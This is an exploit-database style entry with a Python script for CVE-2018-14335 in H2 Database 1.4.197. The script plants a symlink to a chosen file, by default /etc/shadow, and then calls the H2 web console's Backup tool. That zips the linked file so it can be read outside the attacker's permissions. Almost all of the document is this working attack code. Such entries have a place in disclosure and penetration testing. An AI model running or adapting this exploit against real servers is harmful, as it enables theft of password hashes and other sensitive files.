# Exploit Title: H2 Database 1.4.197 - Information Disclosure
# Date: 2018-07-16
# Exploit Author: owodelta
# Vendor Homepage: www.h2database.com
# Software Link: http://www.h2database.com/html/download.html
# Version: all versions
# Tested on: Linux
# CVE : CVE-2018-14335

# Description: Insecure handling of permissions in the backup function allows
# attackers to read sensitive files (outside of their permissions) via a
# symlink to a fake database file.

# PS, thanks to HTB and our team FallenAngels

#!/usr/bin/python

import requests
import argparse
import os
import random

def cleanup(wdir):
	cmd = "rm {}symlink.trace.db".format(wdir)
	os.system(cmd)

def create_symlink(file, wdir):
	cmd = "ln -s {0} {1}symlink.trace.db".format(file,wdir)
	os.system(cmd)


def trigger_symlink(host, wdir):
	outputName = str(random.randint(1000,10000))+".zip"
	#get cookie
	url = 'http://{}'.format(host)
	r = requests.get(url)
	path = r.text.split('href = ')[1].split(';')[0].replace("'","").replace('login.jsp','tools.do')
	url = '{}/{}'.format(url,path)
	payload = {
			"tool":"Backup",
			"args":"-file,"+wdir+outputName+",-dir,"+wdir}
	#print url
	requests.post(url,data=payload).text
	print "File is zipped in: "+wdir+outputName

if __name__ == "__main__":
	parser = argparse.ArgumentParser()
	required = parser.add_argument_group('required arguments')
	required.add_argument("-H",
			"--host",
			metavar='127.0.0.1:8082',
			help="Target host",
            required=True)
	required.add_argument("-D",
			"--dir",
			metavar="/tmp/",
			default="/tmp/",
			help="Writable directory")
	required.add_argument("-F",
			"--file",
			metavar="/etc/shadow",
			default="/etc/shadow",
			help="Desired file to read",)
	args = parser.parse_args()

create_symlink(args.file,args.dir)
trigger_symlink(args.host,args.dir)
cleanup(args.dir)